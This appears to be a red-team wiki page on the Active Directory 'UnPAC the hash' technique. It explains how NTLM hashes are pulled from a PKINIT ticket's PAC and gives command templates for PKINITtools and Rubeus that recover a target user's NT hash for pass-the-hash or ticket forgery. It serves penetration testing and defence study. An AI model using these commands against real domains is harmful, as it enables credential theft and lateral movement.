# UnPAC the hash

## Theory

When using PKINIT to obtain a TGT (Ticket Granting Ticket), the KDC (Key Distribution Center) includes in the ticket a `PAC_CREDENTIAL_INFO` structure containing the NTLM keys (i.e. LM and NT hashes) of the authenticating user. This feature allows users to switch to NTLM authentications when remote servers don't support Kerberos, while still relying on an asymmetric Kerberos pre-authentication verification mechanism (i.e. PKINIT).

The NTLM keys will then be recoverable after a TGS-REQ through U2U which is a Service Ticket request made to the KDC where the user asks to authenticate to itself ([User-to-User authentication](http://www.di-srv.unisa.it/~ads/corso-security/www/CORSO-0001/kerberos/ref/kerberos-faq.html#u2uauth)).

The following protocol diagram demonstrates how UnPAC-the-hash works. It allows attackers that know a user's private key, or attackers able to conduct a [Shadow Credentials](https://red.infiltr8.io/ad/movement/kerberos/shadow-credentials) attacks, to recover the user's LM and NT hashes.

<figure><img src="https://329872044-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMdUKdzuqIuObdvCB3mUR%2Fuploads%2Fgit-blob-afb69d0b3ced8edbe616ca3f08dde5e8b4e899f6%2Fassets_-MHRw3PMJtbDDjbxm5ub_-MlEghFLLIwtdckjt1uI_-MlFBTGo2yVTnvfF2qSS_UnPAC-the-hash.webp?alt=media" alt=""><figcaption></figcaption></figure>

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
From UNIX-like systems, this attack can be conducted with [PKINITtools](https://github.com/dirkjanm/PKINITtools) (Python).

The first step consists in obtaining a TGT by validating a PKINIT pre-authentication first.

```python
gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
```

Once the TGT is obtained, and the session key extracted (printed by gettgtpkinit.py), the getnthash.py script can be used to recover the NT hash.

```bash
export KRB5CCNAME="TGT_CCACHE_FILE"
getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
```

The NT hash can be used for [pass-the-hash](https://red.infiltr8.io/ad/movement/kerberos/broken-reference), [silver ticket](https://red.infiltr8.io/ad/movement/forged-tickets#silver-ticket), or [Kerberos delegations](https://red.infiltr8.io/ad/movement/kerberos/delegations) abuse.
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to requesting a ticket using a certificate and use `/getcredentials` to retrieve the NT hash in the PAC.

```bash
Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://shenaniganslabs.io/2021/06/21/Shadow-Credentials.html>" %}

{% embed url="<https://www.sstic.org/2014/presentation/secrets_dauthentification_pisode_ii__kerberos_contre-attaque/>" %}
